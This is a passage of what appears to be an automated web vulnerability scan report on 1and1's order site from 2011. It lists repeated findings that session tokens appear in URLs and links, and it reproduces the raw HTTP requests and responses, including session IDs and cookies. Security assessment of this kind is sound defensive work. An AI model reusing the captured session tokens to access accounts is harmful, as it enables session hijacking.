Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.109. http://order.1and1.com/xml/order/eshopupselling  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=eshopupselling&amp;page=switch&amp;linkOrigin=eshopupselling&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.110. http://order.1and1.com/xml/order/popupDomainPrices  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.111. http://order.1and1.com/xml/order/popupDomainPrices  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=popupDomainPrices&amp;page=switch&amp;linkOrigin=popupDomainPrices&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a rel="blank" class="target" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.112. http://order.1and1.com/xml/order/popupGreenPower  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupGreenPower?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.113. http://order.1and1.com/xml/order/popupPayPalInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupPayPalInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
